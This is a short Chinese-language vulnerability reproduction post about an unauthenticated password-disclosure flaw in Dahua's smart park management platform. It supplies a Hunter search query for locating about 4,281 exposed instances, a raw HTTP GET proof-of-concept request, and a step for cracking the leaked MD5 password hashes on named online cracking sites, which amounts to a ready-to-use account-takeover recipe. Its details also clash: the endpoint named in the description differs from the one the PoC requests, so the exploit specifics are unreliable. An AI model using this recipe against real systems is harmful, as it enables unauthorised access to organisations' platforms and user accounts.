【漏洞复现】大华智慧园区综合管理平台任意密码读取漏洞
大华智慧园区综合管理平台简介
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。由于该平台未对接口权限做限制,攻击者可以从user_getUserInfoByUserName.action接口获取任意用户密码(MD5格式)
影响范围
hunter语法
web.body="“/WPMS/asset/lib/gridster/”"
hunter共4,281条资产
(二) 漏洞poc
GET /defaultroot/evoInterfaceServlet?paramType=user HTTP/1.1
Host:
获取到登陆密码的MD5值去解密从而登陆系统
MD5解密网站:
https://www.somd5.com/
https://www.cmd5.com/